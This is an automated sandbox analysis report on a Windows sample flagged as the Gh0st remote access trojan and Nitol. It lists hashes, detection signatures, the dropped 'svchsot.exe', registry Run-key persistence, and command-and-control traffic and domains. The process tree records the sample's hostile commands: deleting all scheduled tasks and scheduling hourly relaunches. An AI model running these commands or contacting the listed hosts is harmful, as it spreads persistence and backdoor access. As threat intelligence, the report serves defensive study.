Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ILQ18dgzMU.exe

Overview

General Information

Sample name:ILQ18dgzMU.exe
renamed because original name is a hash value
Original sample name:a153080f9a968b6488cf1cf2e2ea78a3.exe
Analysis ID:1565415
MD5:a153080f9a968b6488cf1cf2e2ea78a3
SHA1:6537f18fb326bcb4d7fc503c40b7bb21a136f560
SHA256:e0989c99125dbc5957c7ecdfdc37ff6b7f31f2979531f3fb8747127243f28b7d
Tags:exeGh0stRATuser-abuse_ch
Infos:

Detection

GhostRat, Nitol
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
Yara detected Nitol
AI detected suspicious sample
Checks if browser processes are running
Contains functionality to detect sleep reduction / modifications
Contains functionality to detect virtual machines (IN, VMware)
Drops executables to the windows directory (C:\Windows) and starts them
Found stalling execution ending in API Sleep call
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Delete All Scheduled Tasks
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to delete services
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ILQ18dgzMU.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\ILQ18dgzMU.exe" MD5: A153080F9A968B6488CF1CF2E2EA78A3)
    • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7468 cmdline: schtasks /delete /tn * /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • sc.exe (PID: 7484 cmdline: sc config Schedule start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • net.exe (PID: 7500 cmdline: net start "Task Scheduler" MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7516 cmdline: C:\Windows\system32\net1 start "Task Scheduler" MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • at.exe (PID: 7532 cmdline: At 0:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7548 cmdline: At 1:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7568 cmdline: At 2:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7584 cmdline: At 3:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7608 cmdline: At 4:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7628 cmdline: At 5:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7664 cmdline: At 6:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7680 cmdline: At 7:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7696 cmdline: At 8:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7712 cmdline: At 9:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7728 cmdline: At 10:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7744 cmdline: At 11:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7760 cmdline: At 12:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7776 cmdline: At 13:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7792 cmdline: At 14:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7808 cmdline: At 15:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7824 cmdline: At 16:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7840 cmdline: At 17:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7856 cmdline: At 18:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7872 cmdline: At 19:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7888 cmdline: At 20:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7904 cmdline: At 21:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7920 cmdline: At 22:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7936 cmdline: At 23:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
      • at.exe (PID: 7952 cmdline: At 24:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe MD5: 2AE20048111861FA09B709D3CC551AD6)
  • svchsot.exe (PID: 8024 cmdline: "C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe" MD5: A153080F9A968B6488CF1CF2E2EA78A3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NitolNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_GhostRatYara detected GhostRatJoe Security
    dump.pcapgh0stunknownhttps://github.com/jackcr/
    • 0x32abd:$a: 47 68 30 73 74 AB 00 00 00 18 01 00 00 78 9C
    • 0x10cde7:$a: 47 68 30 73 74 AA 00 00 00 18 01 00 00 78 9C
    • 0x172dba:$a: 47 68 30 73 74 AA 00 00 00 18 01 00 00 78 9C

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
      00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmpgh0stunknownhttps://github.com/jackcr/
      • 0x0:$a: 47 68 30 73 74 AA 00 00 00 18 01 00 00 78 9C
      00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
        00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
          00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmpgh0stunknownhttps://github.com/jackcr/
          • 0x0:$a: 47 68 30 73 74 AA 00 00 00 18 01 00 00 78 9C
          Click to see the 5 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Delete All Scheduled Tasks
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: schtasks /delete /tn * /f, CommandLine: schtasks /delete /tn * /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7412, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /delete /tn * /f, ProcessId: 7468, ProcessName: schtasks.exe
          Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ILQ18dgzMU.exe, ProcessId: 7384, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\XXXXXX579E5A5B VVVVVVrr2unw==
          Sigma detected: Net.exe Execution
          Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net start "Task Scheduler", CommandLine: net start "Task Scheduler", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7412, ParentProcessName: cmd.exe, ProcessCommandLine: net start "Task Scheduler", ProcessId: 7500, ProcessName: net.exe
          Sigma detected: Start Windows Service Via Net.EXE
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net start "Task Scheduler", CommandLine: net start "Task Scheduler", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7412, ParentProcessName: cmd.exe, ProcessCommandLine: net start "Task Scheduler", ProcessId: 7500, ProcessName: net.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-29T19:12:53.559954+010020169221Malware Command and Control Activity Detected192.168.2.449736172.65.190.1728000TCP
          2024-11-29T19:14:19.251251+010020169221Malware Command and Control Activity Detected192.168.2.449917172.65.190.1728000TCP
          2024-11-29T19:15:44.988375+010020169221Malware Command and Control Activity Detected192.168.2.450004172.65.190.1728000TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-29T19:12:53.559954+010020132141Malware Command and Control Activity Detected192.168.2.449736172.65.190.1728000TCP
          2024-11-29T19:14:19.251251+010020132141Malware Command and Control Activity Detected192.168.2.449917172.65.190.1728000TCP
          2024-11-29T19:15:44.988375+010020132141Malware Command and Control Activity Detected192.168.2.450004172.65.190.1728000TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: ILQ18dgzMU.exeAvira: detected
          Antivirus detection for dropped file
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeAvira: detection malicious, Label: BDS/Agent.IR
          Multi AV Scanner detection for dropped file
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeReversingLabs: Detection: 94%
          Multi AV Scanner detection for submitted file
          Source: ILQ18dgzMU.exeReversingLabs: Detection: 94%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: ILQ18dgzMU.exeJoe Sandbox ML: detected
          Source: ILQ18dgzMU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,0_2_10001A20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,0_2_100014B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10008880 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_10008880
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10009090 FindFirstFileA,FindClose,CreateFileA,CloseHandle,0_2_10009090
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10008CE0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,0_2_10008CE0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100086B0 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,0_2_100086B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10008FD0 FindFirstFileA,FindClose,FindClose,0_2_10008FD0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10008880 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,32_2_10008880
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10009090 FindFirstFileA,FindClose,CreateFileA,CloseHandle,32_2_10009090
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,32_2_10001A20
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,32_2_100014B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10008CE0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,32_2_10008CE0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100086B0 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,32_2_100086B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10008FD0 FindFirstFileA,FindClose,FindClose,32_2_10008FD0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100084F0 GetLogicalDriveStringsA,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,lstrlen,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlen,0_2_100084F0

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.4:49736 -> 172.65.190.172:8000
          Source: Network trafficSuricata IDS: 2016922 - Severity 1 - ET MALWARE Backdoor family PCRat/Gh0st CnC traffic : 192.168.2.4:49736 -> 172.65.190.172:8000
          Source: Network trafficSuricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.4:49917 -> 172.65.190.172:8000
          Source: Network trafficSuricata IDS: 2016922 - Severity 1 - ET MALWARE Backdoor family PCRat/Gh0st CnC traffic : 192.168.2.4:49917 -> 172.65.190.172:8000
          Source: Network trafficSuricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.4:50004 -> 172.65.190.172:8000
          Source: Network trafficSuricata IDS: 2016922 - Severity 1 - ET MALWARE Backdoor family PCRat/Gh0st CnC traffic : 192.168.2.4:50004 -> 172.65.190.172:8000
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1000B880 Sleep,wsprintfA,GetTickCount,GetTickCount,wsprintfA,URLDownloadToFileA,GetTempPathA,fopen,fscanf,fscanf,GetTickCount,wsprintfA,GetTickCount,wsprintfA,URLDownloadToFileA,ShellExecuteA,fscanf,fclose,DeleteFileA,Sleep,0_2_1000B880
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,0_2_10001A20
          Source: global trafficDNS traffic detected: DNS query: www.wk1888.com
          Source: global trafficDNS traffic detected: DNS query: www.af0575.com
          Source: global trafficDNS traffic detected: DNS query: www.fz0575.com
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1000FBB0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,0_2_1000FBB0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1000FBB0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,0_2_1000FBB0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1000FBB0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,32_2_1000FBB0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1000FC20 OpenClipboard,GetClipboardData,CloseClipboard,GlobalSize,GlobalLock,??2@YAPAXI@Z,GlobalUnlock,CloseClipboard,??3@YAXPAX@Z,0_2_1000FC20

          E-Banking Fraud

          barindex
          Checks if browser processes are running
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command0_2_1000A840
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command32_2_1000A840
          Source: at.exeProcess created: 50

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: dump.pcap, type: PCAPMatched rule: gh0st Author: https://github.com/jackcr/
          Source: 00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st Author: https://github.com/jackcr/
          Source: 00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st Author: https://github.com/jackcr/
          Source: 00000000.00000003.3090838933.0000000002150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st Author: https://github.com/jackcr/
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10002920 NtdllDefWindowProc_A,0_2_10002920
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10002920 NtdllDefWindowProc_A,32_2_10002920
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10010E20 OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,DeleteService,RegDeleteKeyA,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,OpenSCManagerA,OpenServiceA,LockServiceDatabase,OpenSCManagerA,OpenServiceA,LockServiceDatabase,OpenSCManagerA,OpenServiceA,ControlService,CloseServiceHandle,OpenSCManagerA,OpenServiceA,LockServiceDatabase,ChangeServiceConfigA,UnlockServiceDatabase,CloseServiceHandle,CloseServiceHandle,Sleep,0_2_10010E20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100121A0 ExitWindowsEx,0_2_100121A0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1000B280 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx,0_2_1000B280
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100121A0 ExitWindowsEx,32_2_100121A0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1000B280 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx,32_2_1000B280
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeFile created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeFile created: C:\Windows\SysWOW64\DefaultJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeFile created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeFile created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe\:Zone.Identifier:$DATAJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeFile created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BATJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeFile created: C:\Windows\SysWOW64\579E5A5B VVVVVVrr2unw==Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_004026B10_2_004026B1
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1002D8000_2_1002D800
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100308100_2_10030810
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100390100_2_10039010
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100688100_2_10068810
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001581D0_2_1001581D
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100358200_2_10035820
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100398200_2_10039820
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100400200_2_10040020
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100360400_2_10036040
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100528410_2_10052841
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003A8500_2_1003A850
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100368600_2_10036860
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100418A00_2_100418A0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100138C00_2_100138C0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100430D00_2_100430D0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001D8F00_2_1001D8F0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1002F9000_2_1002F900
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100331100_2_10033110
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100379100_2_10037910
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100239200_2_10023920
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100299200_2_10029920
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100589200_2_10058920
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100311600_2_10031160
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100351600_2_10035160
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100439600_2_10043960
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100421800_2_10042180
